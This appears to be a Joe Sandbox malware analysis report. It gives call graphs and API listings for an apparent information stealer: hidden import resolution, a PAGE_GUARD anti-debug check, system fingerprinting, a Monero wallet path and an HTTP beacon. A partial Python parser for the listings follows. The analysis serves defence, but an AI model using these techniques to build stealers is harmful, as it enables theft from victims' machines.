fba9b0 4 API calls 15267->15268 15269 fb2040 15268->15269 15270 fba8a0 lstrcpy 15269->15270 15271 fb2049 15270->15271 15272 fba9b0 4 API calls 15271->15272 15273 fb206a 15272->15273 15274 fba8a0 lstrcpy 15273->15274 15275 fb2073 15274->15275 15276 fb207e GetCurrentProcessId 15275->15276 15889 fb9470 OpenProcess 15276->15889 15279 fba920 3 API calls 15280 fb20a4 15279->15280 15281 fba8a0 lstrcpy 15280->15281 15282 fb20ad 15281->15282 15283 fba9b0 4 API calls 15282->15283 15284 fb20d7 15283->15284 15285 fba8a0 lstrcpy 15284->15285 15286 fb20e0 15285->15286 15287 fba9b0 4 API calls 15286->15287 15288 fb2100 15287->15288 15289 fba8a0 lstrcpy 15288->15289 15290 fb2109 15289->15290 15894 fb7e00 GetProcessHeap RtlAllocateHeap RegOpenKeyExA 15290->15894 15293 fba9b0 4 API calls 15294 fb2129 15293->15294 15295 fba8a0 lstrcpy 15294->15295 15296 fb2132 15295->15296 15297 fba9b0 4 API calls 15296->15297 15298 fb2151 15297->15298 15299 fba8a0 lstrcpy 15298->15299 15300 fb215a 15299->15300 15301 fba9b0 4 API calls 15300->15301 15302 fb217b 15301->15302 15303 fba8a0 lstrcpy 15302->15303 15304 fb2184 15303->15304 15898 fb7f60 15304->15898 15307 fba9b0 4 API calls 15308 fb21a4 15307->15308 15309 fba8a0 lstrcpy 15308->15309 15310 fb21ad 15309->15310 15311 fba9b0 4 API calls 15310->15311 15312 fb21cc 15311->15312 15313 fba8a0 lstrcpy 15312->15313 15314 fb21d5 15313->15314 15315 fba9b0 4 API calls 15314->15315 15316 fb21f6 15315->15316 15317 fba8a0 lstrcpy 15316->15317 15318 fb21ff 15317->15318 15911 fb7ed0 GetSystemInfo wsprintfA 15318->15911 15321 fba9b0 4 API calls 15322 fb221f 15321->15322 15323 fba8a0 lstrcpy 15322->15323 15324 fb2228 15323->15324 15325 fba9b0 4 API calls 15324->15325 15326 fb2247 15325->15326 15327 fba8a0 lstrcpy 15326->15327 15328 fb2250 15327->15328 15329 fba9b0 4 API calls 15328->15329 15330 fb2270 15329->15330 15331 fba8a0 lstrcpy 15330->15331 15332 fb2279 15331->15332 15913 fb8100 GetProcessHeap RtlAllocateHeap 15332->15913 15335 fba9b0 4 API calls 15336 
fb2299 15335->15336 15337 fba8a0 lstrcpy 15336->15337 15338 fb22a2 15337->15338 15339 fba9b0 4 API calls 15338->15339 15340 fb22c1 15339->15340 15341 fba8a0 lstrcpy 15340->15341 15342 fb22ca 15341->15342 15343 fba9b0 4 API calls 15342->15343 15344 fb22eb 15343->15344 15345 fba8a0 lstrcpy 15344->15345 15346 fb22f4 15345->15346 15919 fb87c0 15346->15919 15349 fba920 3 API calls 15350 fb231e 15349->15350 15351 fba8a0 lstrcpy 15350->15351 15352 fb2327 15351->15352 15353 fba9b0 4 API calls 15352->15353 15354 fb2351 15353->15354 15355 fba8a0 lstrcpy 15354->15355 15356 fb235a 15355->15356 15357 fba9b0 4 API calls 15356->15357 15358 fb237a 15357->15358 15359 fba8a0 lstrcpy 15358->15359 15360 fb2383 15359->15360 15361 fba9b0 4 API calls 15360->15361 15362 fb23a2 15361->15362 15363 fba8a0 lstrcpy 15362->15363 15364 fb23ab 15363->15364 15924 fb81f0 15364->15924 15366 fb23c2 15367 fba920 3 API calls 15366->15367 15368 fb23d5 15367->15368 15369 fba8a0 lstrcpy 15368->15369 15370 fb23de 15369->15370 15371 fba9b0 4 API calls 15370->15371 15372 fb240a 15371->15372 15373 fba8a0 lstrcpy 15372->15373 15374 fb2413 15373->15374 15375 fba9b0 4 API calls 15374->15375 15376 fb2432 15375->15376 15377 fba8a0 lstrcpy 15376->15377 15378 fb243b 15377->15378 15379 fba9b0 4 API calls 15378->15379 15380 fb245c 15379->15380 15381 fba8a0 lstrcpy 15380->15381 15382 fb2465 15381->15382 15383 fba9b0 4 API calls 15382->15383 15384 fb2484 15383->15384 15385 fba8a0 lstrcpy 15384->15385 15386 fb248d 15385->15386 15387 fba9b0 4 API calls 15386->15387 15388 fb24ae 15387->15388 15389 fba8a0 lstrcpy 15388->15389 15390 fb24b7 15389->15390 15932 fb8320 15390->15932 15392 fb24d3 15393 fba920 3 API calls 15392->15393 15394 fb24e6 15393->15394 15395 fba8a0 lstrcpy 15394->15395 15396 fb24ef 15395->15396 15397 fba9b0 4 API calls 15396->15397 15398 fb2519 15397->15398 15399 fba8a0 lstrcpy 15398->15399 15400 fb2522 15399->15400 15401 fba9b0 4 API calls 15400->15401 15402 fb2543 15401->15402 15403 fba8a0 lstrcpy 
15402->15403 15404 fb254c 15403->15404 15405 fb8320 17 API calls 15404->15405 15406 fb2568 15405->15406 15407 fba920 3 API calls 15406->15407 15408 fb257b 15407->15408 15409 fba8a0 lstrcpy 15408->15409 15410 fb2584 15409->15410 15411 fba9b0 4 API calls 15410->15411 15412 fb25ae 15411->15412 15413 fba8a0 lstrcpy 15412->15413 15414 fb25b7 15413->15414 15415 fba9b0 4 API calls 15414->15415 15416 fb25d6 15415->15416 15417 fba8a0 lstrcpy 15416->15417 15418 fb25df 15417->15418 15419 fba9b0 4 API calls 15418->15419 15420 fb2600 15419->15420 15421 fba8a0 lstrcpy 15420->15421 15422 fb2609 15421->15422 15968 fb8680 15422->15968 15424 fb2620 15425 fba920 3 API calls 15424->15425 15426 fb2633 15425->15426 15427 fba8a0 lstrcpy 15426->15427 15428 fb263c 15427->15428 15429 fb265a lstrlen 15428->15429 15430 fb266a 15429->15430 15431 fba740 lstrcpy 15430->15431 15432 fb267c 15431->15432 15433 fa1590 lstrcpy 15432->15433 15434 fb268d 15433->15434 15978 fb5190 15434->15978 15436 fb2699 15436->13868 16166 fbaad0 15437->16166 15439 fa5009 InternetOpenUrlA 15440 fa5021 15439->15440 15441 fa502a InternetReadFile 15440->15441 15442 fa50a0 InternetCloseHandle InternetCloseHandle 15440->15442 15441->15440 15443 fa50ec 15442->15443 15443->13872 16167 fa98d0 15444->16167 15446 fb0759 15447 fb0a38 15446->15447 15448 fb077d 15446->15448 15449 fa1590 lstrcpy 15447->15449 15451 fb0799 StrCmpCA 15448->15451 15450 fb0a49 15449->15450 16343 fb0250 15450->16343 15453 fb07a8 15451->15453 15454 fb0843 15451->15454 15455 fba7a0 lstrcpy 15453->15455 15458 fb0865 StrCmpCA 15454->15458 15456 fb07c3 15455->15456 15459 fa1590 lstrcpy 15456->15459 15460 fb0874 15458->15460 15496 fb096b 15458->15496 15461 fb080c 15459->15461 15462 fba740 lstrcpy 15460->15462 15463 fba7a0 lstrcpy 15461->15463 15465 fb0881 15462->15465 15466 fb0823 15463->15466 15464 fb099c StrCmpCA 15467 fb09ab 15464->15467 15468 fb0a2d 15464->15468 15469 fba9b0 4 API calls 15465->15469 15471 fba7a0 lstrcpy 15466->15471 15472 fa1590 lstrcpy 
15467->15472 15468->13876 15470 fb08ac 15469->15470 15473 fba920 3 API calls 15470->15473 15474 fb083e 15471->15474 15475 fb09f4 15472->15475 15477 fb08b3 15473->15477 16170 fafb00 15474->16170 15476 fba7a0 lstrcpy 15475->15476 15479 fb0a0d 15476->15479 15480 fba9b0 4 API calls 15477->15480 15481 fba7a0 lstrcpy 15479->15481 15482 fb08ba 15480->15482 15483 fb0a28 15481->15483 15484 fba8a0 lstrcpy 15482->15484 16286 fb0030 15483->16286 15496->15464 15818 fba7a0 lstrcpy 15817->15818 15819 fa1683 15818->15819 15820 fba7a0 lstrcpy 15819->15820 15821 fa1695 15820->15821 15822 fba7a0 lstrcpy 15821->15822 15823 fa16a7 15822->15823 15824 fba7a0 lstrcpy 15823->15824 15825 fa15a3 15824->15825 15825->14699 15827 fa47c6 15826->15827 15828 fa4838 lstrlen 15827->15828 15852 fbaad0 15828->15852 15830 fa4848 InternetCrackUrlA 15831 fa4867 15830->15831 15831->14776 15833 fba740 lstrcpy 15832->15833 15834 fb8b74 15833->15834 15835 fba740 lstrcpy 15834->15835 15836 fb8b82 GetSystemTime 15835->15836 15838 fb8b99 15836->15838 15837 fba7a0 lstrcpy 15839 fb8bfc 15837->15839 15838->15837 15839->14791 15841 fba931 15840->15841 15842 fba988 15841->15842 15844 fba968 lstrcpy lstrcat 15841->15844 15843 fba7a0 lstrcpy 15842->15843 15845 fba994 15843->15845 15844->15842 15845->14795 15846->14909 15848 fa4eee 15847->15848 15849 fa9af9 LocalAlloc 15847->15849 15848->14797 15848->14800 15849->15848 15850 fa9b14 CryptStringToBinaryA 15849->15850 15850->15848 15851 fa9b39 LocalFree 15850->15851 15851->15848 15852->15830 15853->14919 15854->15060 15855->15062 15856->15070 15985 fb77a0 15857->15985 15860 fb1c1e 15860->15152 15861 fb76c6 RegOpenKeyExA 15862 fb76e7 RegQueryValueExA 15861->15862 15863 fb7704 RegCloseKey 15861->15863 15862->15863 15863->15860 15865 fb1c99 15864->15865 15865->15166 15867 fb1e09 15866->15867 15867->15208 15869 fb7a9a wsprintfA 15868->15869 15870 fb1e84 15868->15870 15869->15870 15870->15222 15872 fb7b4d 15871->15872 15873 fb1efe 15871->15873 15992 fb8d20 LocalAlloc 
CharToOemW 15872->15992 15873->15236 15876 fba740 lstrcpy 15875->15876 15877 fb7bcc GetKeyboardLayoutList LocalAlloc GetKeyboardLayoutList 15876->15877 15886 fb7c25 15877->15886 15878 fb7d18 15880 fb7d28 15878->15880 15881 fb7d1e LocalFree 15878->15881 15879 fb7c46 GetLocaleInfoA 15879->15886 15882 fba7a0 lstrcpy 15880->15882 15881->15880 15885 fb7d37 15882->15885 15883 fba9b0 lstrcpy lstrlen lstrcpy lstrcat 15883->15886 15884 fba8a0 lstrcpy 15884->15886 15885->15249 15886->15878 15886->15879 15886->15883 15886->15884 15888 fb2008 15887->15888 15888->15264 15890 fb9493 GetModuleFileNameExA CloseHandle 15889->15890 15891 fb94b5 15889->15891 15890->15891 15892 fba740 lstrcpy 15891->15892 15893 fb2091 15892->15893 15893->15279 15895 fb7e68 RegQueryValueExA 15894->15895 15897 fb2119 15894->15897 15896 fb7e8e RegCloseKey 15895->15896 15896->15897 15897->15293 15899 fb7fb9 GetLogicalProcessorInformationEx 15898->15899 15900 fb7fd8 GetLastError 15899->15900 15907 fb8029 15899->15907 15903 fb8022 15900->15903 15910 fb7fe3 15900->15910 15904 fb2194 15903->15904 15906 fb89f0 2 API calls 15903->15906 15904->15307 15905 fb89f0 2 API calls 15908 fb807b 15905->15908 15906->15904 15907->15905 15908->15903 15909 fb8084 wsprintfA 15908->15909 15909->15904 15910->15899 15910->15904 15993 fb89f0 15910->15993 15996 fb8a10 GetProcessHeap RtlAllocateHeap 15910->15996 15912 fb220f 15911->15912 15912->15321 15914 fb89b0 15913->15914 15915 fb814d GlobalMemoryStatusEx 15914->15915 15916 fb8163 15915->15916 15917 fb819b wsprintfA 15916->15917 15918 fb2289 15917->15918 15918->15335 15920 fb87fb GetProcessHeap RtlAllocateHeap wsprintfA 15919->15920 15922 fba740 lstrcpy 15920->15922 15923 fb230b 15922->15923 15923->15349 15925 fba740 lstrcpy 15924->15925 15931 fb8229 15925->15931 15926 fb8263 15927 fba7a0 lstrcpy 15926->15927 15929 fb82dc 15927->15929 15928 fba9b0 lstrcpy lstrlen lstrcpy lstrcat 15928->15931 15929->15366 15930 fba8a0 lstrcpy 15930->15931 15931->15926 15931->15928 15931->15930 
15933 fba740 lstrcpy 15932->15933 15934 fb835c RegOpenKeyExA 15933->15934 15935 fb83ae 15934->15935 15936 fb83d0 15934->15936 15937 fba7a0 lstrcpy 15935->15937 15938 fb83f8 RegEnumKeyExA 15936->15938 15939 fb8613 RegCloseKey 15936->15939 15948 fb83bd 15937->15948 15940 fb843f wsprintfA RegOpenKeyExA 15938->15940 15941 fb860e 15938->15941 15942 fba7a0 lstrcpy 15939->15942 15943 fb84c1 RegQueryValueExA 15940->15943 15944 fb8485 RegCloseKey RegCloseKey 15940->15944 15941->15939 15942->15948 15946 fb84fa lstrlen 15943->15946 15947 fb8601 RegCloseKey 15943->15947 15945 fba7a0 lstrcpy 15944->15945 15945->15948 15946->15947 15949 fb8510 15946->15949 15947->15941 15948->15392 15950 fba9b0 4 API calls 15949->15950 15951 fb8527 15950->15951 15952 fba8a0 lstrcpy 15951->15952 15953 fb8533 15952->15953 15954 fba9b0 4 API calls 15953->15954 15955 fb8557 15954->15955 15956 fba8a0 lstrcpy 15955->15956 15957 fb8563 15956->15957 15958 fb856e RegQueryValueExA 15957->15958 15958->15947 15959 fb85a3 15958->15959 15960 fba9b0 4 API calls 15959->15960 15961 fb85ba 15960->15961 15962 fba8a0 lstrcpy 15961->15962 15963 fb85c6 15962->15963 15964 fba9b0 4 API calls 15963->15964 15965 fb85ea 15964->15965 15966 fba8a0 lstrcpy 15965->15966 15967 fb85f6 15966->15967 15967->15947 15969 fba740 lstrcpy 15968->15969 15970 fb86bc CreateToolhelp32Snapshot Process32First 15969->15970 15971 fb86e8 Process32Next 15970->15971 15972 fb875d CloseHandle 15970->15972 15971->15972 15977 fb86fd 15971->15977 15973 fba7a0 lstrcpy 15972->15973 15975 fb8776 15973->15975 15974 fba9b0 lstrcpy lstrlen lstrcpy lstrcat 15974->15977 15975->15424 15976 fba8a0 lstrcpy 15976->15977 15977->15971 15977->15974 15977->15976 15979 fba7a0 lstrcpy 15978->15979 15980 fb51b5 15979->15980 15981 fa1590 lstrcpy 15980->15981 15982 fb51c6 15981->15982 15997 fa5100 15982->15997 15984 fb51cf 15984->15436 15988 fb7720 GetProcessHeap RtlAllocateHeap RegOpenKeyExA 15985->15988 15987 fb76b9 15987->15860 15987->15861 15989 fb7780 RegCloseKey 
Call-graph tail (continuation of the preceding function's graph). Nodes that reach Windows APIs, grouped by path:
• fb7765 RegQueryValueExA; fb89f9 GetProcessHeap, HeapFree
• fa5119 path (a second HTTP routine alongside fa4880 below): fba7a0 lstrcpy → fa47b0 (2 API calls) → fb8ea0 → fa5192 lstrlen → fb8ea0 → fba740 lstrcpy × 5 → fa51fd InternetOpenA, StrCmpCA → string building via fb8b60 / fba920 / fba8a0 / fba9b0 → fa5329 InternetConnectA → fa5359 HttpOpenRequestA → further fba9b0 / fba8a0 / fba920 string building; failure paths fa58b7 and fa58c4 InternetCloseHandle
• fb8ea0: fb8ead CryptBinaryToStringA → fb8ece GetProcessHeap, RtlAllocateHeap → fb8f05 CryptBinaryToStringA (the usual two-call pattern: size query, then encode into the fresh buffer)
• fb0266 path: fba740 lstrcpy → fb8de0 (2 API calls) → fba920 / fba8a0 / fba9b0
• fa9880 → fa6fb0 → fa6d40: fa6660 (fa668f and fa6743 VirtualAlloc) → fa69b0 (fa6a09 LoadLibraryA, fb8a10 GetProcessHeap, RtlAllocateHeap, fa6ba8 GetProcAddress) → fa6ee6 VirtualFree, fa6f26 FreeLibrary, fb89f0 (2 API calls)

                                    Control-flow Graph
                                    • fb9860-fb9874: call fb9750, then either fall through to fb987a-fb9a8e (call fb9780, GetProcAddress × 21, all against module base 74DD0000) or skip directly to fb9a93-fb9af2 (LoadLibraryA × 5)
                                    • fb9af4-fb9b08, fb9b16-fb9b41, fb9b4f-fb9b63, fb9b71-fb9b84, fb9b92-fb9bbc: five conditional blocks resolving one or two further exports each (GetProcAddress × 1, 2, 1, 1, 2) from the five freshly loaded modules (bases 75A70000, 75290000, 75BD0000, 75450000, 76E90000); the skip targets are fb9b0d-fb9b14, fb9b46-fb9b4d, fb9b68-fb9b6f, fb9b89-fb9b90 and the return block fb9bc1-fb9bc2
                                    APIs
                                    • GetProcAddress.KERNEL32(74DD0000,008C2170), ref: 00FB98A1
                                    • GetProcAddress.KERNEL32(74DD0000,008C2320), ref: 00FB98BA
                                    • GetProcAddress.KERNEL32(74DD0000,008C22D8), ref: 00FB98D2
                                    • GetProcAddress.KERNEL32(74DD0000,008C22F0), ref: 00FB98EA
                                    • GetProcAddress.KERNEL32(74DD0000,008C2428), ref: 00FB9903
                                    • GetProcAddress.KERNEL32(74DD0000,008C91B0), ref: 00FB991B
                                    • GetProcAddress.KERNEL32(74DD0000,008B5430), ref: 00FB9933
                                    • GetProcAddress.KERNEL32(74DD0000,008B52B0), ref: 00FB994C
                                    • GetProcAddress.KERNEL32(74DD0000,008C2458), ref: 00FB9964
                                    • GetProcAddress.KERNEL32(74DD0000,008C23F8), ref: 00FB997C
                                    • GetProcAddress.KERNEL32(74DD0000,008C21A0), ref: 00FB9995
                                    • GetProcAddress.KERNEL32(74DD0000,008C21B8), ref: 00FB99AD
                                    • GetProcAddress.KERNEL32(74DD0000,008B5450), ref: 00FB99C5
                                    • GetProcAddress.KERNEL32(74DD0000,008C21E8), ref: 00FB99DE
                                    • GetProcAddress.KERNEL32(74DD0000,008C2200), ref: 00FB99F6
                                    • GetProcAddress.KERNEL32(74DD0000,008B53D0), ref: 00FB9A0E
                                    • GetProcAddress.KERNEL32(74DD0000,008C2218), ref: 00FB9A27
                                    • GetProcAddress.KERNEL32(74DD0000,008C2230), ref: 00FB9A3F
                                    • GetProcAddress.KERNEL32(74DD0000,008B5230), ref: 00FB9A57
                                    • GetProcAddress.KERNEL32(74DD0000,008C2248), ref: 00FB9A70
                                    • GetProcAddress.KERNEL32(74DD0000,008B5470), ref: 00FB9A88
                                    • LoadLibraryA.KERNEL32(008C24D0,?,00FB6A00), ref: 00FB9A9A
                                    • LoadLibraryA.KERNEL32(008C24A0,?,00FB6A00), ref: 00FB9AAB
                                    • LoadLibraryA.KERNEL32(008C24E8,?,00FB6A00), ref: 00FB9ABD
                                    • LoadLibraryA.KERNEL32(008C2500,?,00FB6A00), ref: 00FB9ACF
                                    • LoadLibraryA.KERNEL32(008C2530,?,00FB6A00), ref: 00FB9AE0
                                    • GetProcAddress.KERNEL32(75A70000,008C24B8), ref: 00FB9B02
                                    • GetProcAddress.KERNEL32(75290000,008C2470), ref: 00FB9B23
                                    • GetProcAddress.KERNEL32(75290000,008C2488), ref: 00FB9B3B
                                    • GetProcAddress.KERNEL32(75BD0000,008C2518), ref: 00FB9B5D
                                    • GetProcAddress.KERNEL32(75450000,008B5490), ref: 00FB9B7E
                                    • GetProcAddress.KERNEL32(76E90000,008C9120), ref: 00FB9B9F
                                    • GetProcAddress.KERNEL32(76E90000,NtQueryInformationProcess), ref: 00FB9BB6
                                    Strings
                                    • NtQueryInformationProcess, xrefs: 00FB9BAA
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1746921338.0000000000FA1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                    • Associated: 00000000.00000002.1746901409.0000000000FA0000.00000004.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1746921338.0000000001051000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1746921338.000000000105D000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1746921338.0000000001082000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1746921338.00000000011EA000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1747120792.00000000011FE000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1747120792.0000000001390000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1747120792.0000000001470000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1747120792.0000000001493000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1747120792.000000000149C000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1747120792.00000000014AA000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1747457383.00000000014AB000.00000080.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1747581886.0000000001650000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1747599841.0000000001651000.00000080.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_fa0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: AddressProc$LibraryLoad
                                    • String ID: NtQueryInformationProcess
                                    • API String ID: 2238633743-2781105232
                                    • Opcode ID: c403630ce8ce39d0dba88153808d41b8dd18454ea0c14f14fe725acd8be8f4dc
                                    • Instruction ID: 38bb1b399e0d2bc6da2023e7bf271eef2e7c1e333bcc503738c78ff5ff5f36cc
                                    • Opcode Fuzzy Hash: c403630ce8ce39d0dba88153808d41b8dd18454ea0c14f14fe725acd8be8f4dc
                                    • Instruction Fuzzy Hash: F4A12DB99406409FD37CEFE8F5889563BF9FF8C302705853AA6268B24CD63A94C1DB50

                                    Control-flow Graph
                                    • fa45c0-fa4695: RtlAllocateHeap, then a loop (head fa46a0-fa46a6, body fa46ac-fa474a) whose exit reaches fa474f-fa47a9: VirtualProtect with flNewProtect 00000100 (PAGE_GUARD) on a 4-byte range
                                    APIs
                                    • RtlAllocateHeap.NTDLL(00000000), ref: 00FA460F
                                    • VirtualProtect.KERNEL32(?,00000004,00000100,00000000), ref: 00FA479C
                                    Strings
                                    • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00FA45C7, 00FA45D2, 00FA45DD, 00FA45E8, 00FA45F3, 00FA4617, 00FA4622, 00FA462D, 00FA4638, 00FA4643, 00FA4657, 00FA4662, 00FA466D, 00FA4678, 00FA4683, 00FA46AC, 00FA46B7, 00FA46C2, 00FA46CD, 00FA46D8, 00FA4713, 00FA471E, 00FA4729, 00FA4734, 00FA473F, 00FA474F, 00FA475A, 00FA4765, 00FA4770, 00FA477B (30 references to the same benign-looking sentence, spread across the allocation block, the loop body and the VirtualProtect block)
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1746921338.0000000000FA1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_fa0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: AllocateHeapProtectVirtual
                                    • String ID: The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom. (the same string repeated, '$'-separated, once for each xref listed above)
                                    • API String ID: 1542196881-2218711628
                                    • Opcode ID: c912dca730f0dda883c5f0fd622077930b4181cfbf4e3ae7ec6aaceb9b5120fb
                                    • Instruction ID: cc5c3648e279c382ed3f68426742d192933257871dfac18fb9eb7c64ec2eba70
                                    • Opcode Fuzzy Hash: c912dca730f0dda883c5f0fd622077930b4181cfbf4e3ae7ec6aaceb9b5120fb
                                    • Instruction Fuzzy Hash: EC41F1606F7A057AC778B7A48D5BFDD76665F82F10FA0504CB80052282CFB8E5887727

                                    Control-flow Graph
                                    • fa4880-fa4942: call fba7a0, fa47b0 (URL parsing, see the InternetCrackUrlA subcall below), fba740 × 5, InternetOpenA, StrCmpCA; on failure the function jumps to fa4ecb-fa4ef3 (InternetCloseHandle, call fbaad0, fa9ac0) and the cleanup tail fa4ef5-fa4f2d / fa4f32-fa4fa2 (call fb8990 × 2, fba7a0, fba800 × 8)
                                    • fa4955-fa4acd: builds the connection strings with fb8b60, fba920, fba8a0, fba800 and fba9b0, then InternetConnectA; fa4ad3-fa4ae5 is a two-way branch ahead of fa4aef-fa4b22 HttpOpenRequestA, whose failure path is fa4ebe-fa4ec5 (InternetCloseHandle)
                                    • fa4b28-fa4e28: assembles the request body through repeated fba9b0 / fba8a0 / fba800 / fba920 calls (lstrlen × 2, fbaad0 × 4), then HttpSendRequestA
                                    • fa4e32-fa4e5c: InternetReadFile loop; the check at fa4e5e-fa4e65 either appends the chunk via fa4e69-fa4ea7 (fba9b0, fba8a0, fba800) and re-enters the loop, or falls into fa4e67-fa4eb9 (InternetCloseHandle, fba800) once the read is exhausted
                                    APIs
                                      • Part of subcall function 00FBA7A0: lstrcpy.KERNEL32(?,00000000), ref: 00FBA7E6
                                      • Part of subcall function 00FA47B0: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 00FA4839
                                      • Part of subcall function 00FA47B0: InternetCrackUrlA.WININET(00000000,00000000), ref: 00FA4849
                                      • Part of subcall function 00FBA740: lstrcpy.KERNEL32(00FC0E17,00000000), ref: 00FBA788
                                    • InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 00FA4915
                                    • StrCmpCA.SHLWAPI(?,008CEB98), ref: 00FA493A
                                    • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00FA4ABA
                                    • lstrlen.KERNEL32(00000000,00000000,?,?,?,?,00FC0DDB,00000000,?,?,00000000,?,",00000000,?,008CEAB8), ref: 00FA4DE8
                                    • lstrlen.KERNEL32(00000000,00000000,00000000), ref: 00FA4E04
                                    • HttpSendRequestA.WININET(00000000,00000000,00000000), ref: 00FA4E18
                                    • InternetReadFile.WININET(00000000,?,000007CF,?), ref: 00FA4E49
                                    • InternetCloseHandle.WININET(00000000), ref: 00FA4EAD
                                    • InternetCloseHandle.WININET(00000000), ref: 00FA4EC5
                                    • HttpOpenRequestA.WININET(00000000,008CEA38,?,008CE268,00000000,00000000,00400100,00000000), ref: 00FA4B15
                                      • Part of subcall function 00FBA9B0: lstrlen.KERNEL32(?,008C8F50,?,\Monero\wallet.keys,00FC0E17), ref: 00FBA9C5
                                      • Part of subcall function 00FBA9B0: lstrcpy.KERNEL32(00000000), ref: 00FBAA04
                                      • Part of subcall function 00FBA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00FBAA12
                                      • Part of subcall function 00FBA8A0: lstrcpy.KERNEL32(?,00FC0E17), ref: 00FBA905
                                      • Part of subcall function 00FBA920: lstrcpy.KERNEL32(00000000,?), ref: 00FBA972
                                      • Part of subcall function 00FBA920: lstrcat.KERNEL32(00000000), ref: 00FBA982
                                    • InternetCloseHandle.WININET(00000000), ref: 00FA4ECF
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1746921338.0000000000FA1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_fa0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Internet$lstrcpy$lstrlen$CloseHandle$HttpOpenRequestlstrcat$ConnectCrackFileReadSend
                                    • String ID: "$"$------$------$------
                                    • API String ID: 460715078-2180234286
                                    • Opcode ID: dc7cb5f1598743e74b7f38e78cb57ee543ef502b7a513a0b3123ac50dbfe4f36
                                    • Instruction ID: 51cfc5bf3c0e2eb0050a00cab3d4a98ae08ee1a760f0232ba63ade2c5f39512e
                                    • Opcode Fuzzy Hash: dc7cb5f1598743e74b7f38e78cb57ee543ef502b7a513a0b3123ac50dbfe4f36
                                    • Instruction Fuzzy Hash: F5121F71910118AADB29EB91DDA2FEEB378BF14300F5041A9B10673491EF746F49EF62
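The two listings above (the resolver at 00FB9860 and the HTTP routine at 00FA4880) are worth more than a glance: the first resolves 21 exports from one module base and five more from the five libraries it loads, asking for exactly one by plaintext name (NtQueryInformationProcess), and the second is a complete WinINet exchange whose constants (INTERNET_OPEN_TYPE_DIRECT, INTERNET_SERVICE_HTTP, the 0x00400100 request flags, a 0x7CF-byte read buffer) describe the beacon. The script below is an added example, not code from the report or from the sample: it parses the report's "Api.MODULE(args), ref: ADDR" bullet lines, sorts them by call site (the listing itself puts HttpOpenRequestA after InternetCloseHandle), and summarises both behaviours. The embedded input is an abridged copy of the lines above; the heuristics and their names are my own.

```python
"""Parse Joe Sandbox per-function API listings and summarise run-time import
resolution and a WinINet beacon chain.  Added example, not report code."""
import re
from collections import Counter
from dataclasses import dataclass
from typing import Optional

# Constructed input: lines copied (abridged) from the two listings above.
RESOLVER_LINES = """
• GetProcAddress.KERNEL32(74DD0000,008C2170), ref: 00FB98A1
• GetProcAddress.KERNEL32(74DD0000,008C2320), ref: 00FB98BA
• GetProcAddress.KERNEL32(74DD0000,008B5470), ref: 00FB9A88
• LoadLibraryA.KERNEL32(008C24D0,?,00FB6A00), ref: 00FB9A9A
• LoadLibraryA.KERNEL32(008C2530,?,00FB6A00), ref: 00FB9AE0
• GetProcAddress.KERNEL32(76E90000,008C9120), ref: 00FB9B9F
• GetProcAddress.KERNEL32(76E90000,NtQueryInformationProcess), ref: 00FB9BB6
"""
BEACON_LINES = """
  • Part of subcall function 00FBA7A0: lstrcpy.KERNEL32(?,00000000), ref: 00FBA7E6
  • Part of subcall function 00FA47B0: InternetCrackUrlA.WININET(00000000,00000000), ref: 00FA4849
• InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 00FA4915
• StrCmpCA.SHLWAPI(?,008CEB98), ref: 00FA493A
• InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00FA4ABA
• HttpSendRequestA.WININET(00000000,00000000,00000000), ref: 00FA4E18
• InternetReadFile.WININET(00000000,?,000007CF,?), ref: 00FA4E49
• InternetCloseHandle.WININET(00000000), ref: 00FA4EC5
• HttpOpenRequestA.WININET(00000000,008CEA38,?,008CE268,00000000,00000000,00400100,00000000), ref: 00FA4B15
"""

API_LINE = re.compile(
    r"^\s*•\s*(?:Part of subcall function (?P<parent>[0-9A-F]{8}):\s*)?"
    r"(?P<api>\w+)\.(?P<module>\w+)\((?P<args>[^)]*)\),\s*ref:\s*(?P<ref>[0-9A-F]{8})\s*$")


@dataclass(frozen=True)
class ApiCall:
    api: str
    module: str
    args: tuple            # raw argument cells: 8-digit hex, "?" for unknown, or a string
    ref: int               # call-site address
    parent: Optional[str]  # set when the report marks the line "Part of subcall function"


def parse_api_lines(text):
    """Return the API calls of a listing sorted by call-site address, so the
    order reflects code layout rather than the report's listing order."""
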